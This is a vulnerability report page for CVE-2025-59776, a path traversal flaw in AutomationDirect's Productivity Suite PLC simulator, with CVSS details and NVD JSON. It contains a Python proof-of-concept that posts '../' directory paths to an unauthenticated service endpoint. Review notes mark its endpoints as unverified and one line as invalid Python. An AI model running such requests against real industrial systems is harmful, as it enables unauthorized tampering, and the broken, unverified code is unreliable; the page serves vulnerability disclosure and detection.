Security Vulnerability Report
CVE-2025-59776 — CVSS score 4.0 (MEDIUM)

CVE-2025-59776

Published: 2025-10-23 23:15:37
Last Modified: 2026-04-15 00:35:42

Description

A relative path traversal vulnerability was discovered in Productivity Suite software version 4.4.1.19. The vulnerability allows an unauthenticated remote attacker to interact with the ProductivityService PLC simulator and create arbitrary directories on the target machine.

CVSS Details

CVSS Score
4.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Productivity Suite < 4.4.1.19
Productivity Suite = 4.4.1.19

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-59776 Path Traversal PoC
# Target: Productivity Suite Software v4.4.1.19
# Vulnerability: Relative Path Traversal in ProductivityService
#
# NOTE(review): the HTTP endpoint paths, the port and the JSON request
# schema used below appear only in this PoC; none of them is given by the
# advisory text on this page, so treat them as unverified against the
# product until confirmed from the vendor/CISA advisory.

target_ip: str = "<target_ip>"  # placeholder; replace with the host under authorized test
target_port: int = 12345  # Default ProductivityService port (per the PoC author — not stated on this page; verify)


def exploit_path_traversal() -> bool:
    """
    Exploit path traversal to create arbitrary directories
    on the target machine via ProductivityService PLC simulator

    Sends a single JSON POST whose ``path`` field contains ``../``
    segments. Returns True only when the server answers HTTP 200;
    returns False on any other status code or on a requests-level
    transport error. A 200 by itself is not proof the directory was
    created — see ``verify_directory_creation``.
    """
    # Construct malicious path with path traversal sequences
    # Defender note: this is the observable to hunt for in request logs —
    # a JSON "path" value containing ".." segments. The server-side fix
    # for CWE-23 is to canonicalize the submitted path and reject it when
    # the resolved location is outside the intended base directory.
    malicious_path = "../../../etc/test_directory"
    # Target endpoint for PLC simulator interaction
    url = f"http://{target_ip}:{target_port}/ProductivityService/api/directory/create"
    # Payload with path traversal
    payload = {
        "path": malicious_path,
        "action": "create"
    }
    # The User-Agent mimics the product's own client; together with the
    # ".." path this is a usable detection signature for this PoC.
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "ProductivitySuite-Client/4.4.1.19"
    }
    try:
        response = requests.post(url, json=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            # Any 200 is treated as success; the body is printed but not inspected.
            print(f"[+] Successfully created directory via path traversal")
            print(f"[+] Response: {response.text}")
            return True
        else:
            print(f"[-] Failed with status code: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        # Only transport/HTTP-client errors are caught; anything else propagates.
        print(f"[-] Request failed: {e}")
        return False


def verify_directory_creation() -> bool:
    """
    Verify if directory was created at unexpected location

    Posts the same traversal path to an ``exists`` endpoint and reports
    True when the response body is judged to say the directory exists;
    False otherwise, including on any exception.
    """
    check_url = f"http://{target_ip}:{target_port}/ProductivityService/api/directory/exists"
    payload = {
        "path": "../../../etc/test_directory"
    }
    try:
        response = requests.post(check_url, json=payload, timeout=10)
        # NOTE(review): this condition is not valid Python syntax, so the
        # module does not parse as pasted; the verification step never runs.
        if "exists": true in response.text:
            print("[+] Directory creation confirmed - vulnerability is exploitable")
            return True
    except:
        # Bare except: swallows every exception, including KeyboardInterrupt
        # and SystemExit, and reports nothing — a failed check is
        # indistinguishable from "directory absent".
        pass
    return False


if __name__ == "__main__":
    # Fires the request unconditionally against the configured target;
    # there is no dry-run or confirmation step.
    print("CVE-2025-59776 Path Traversal Exploitation")
    print("Target: Productivity Suite v4.4.1.19")
    print("-" * 50)
    if exploit_path_traversal():
        verify_directory_creation()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59776", "sourceIdentifier": "[email protected]", "published": "2025-10-23T23:15:37.340", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A relative path traversal vulnerability was discovered in Productivity Suite software version 4.4.1.19. The vulnerability allows an unauthenticated remote attacker to interact with the ProductivityService PLC simulator and create arbitrary directories on the target machine."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-23"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-296-01.json", "source": "[email protected]"}, {"url": "https://support.automationdirect.com/docs/securityconsiderations.pdf", "source": "[email protected]"}, {"url": "https://www.automationdirect.com/support/software-downloads", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-296-01", "source": "[email protected]"}]}}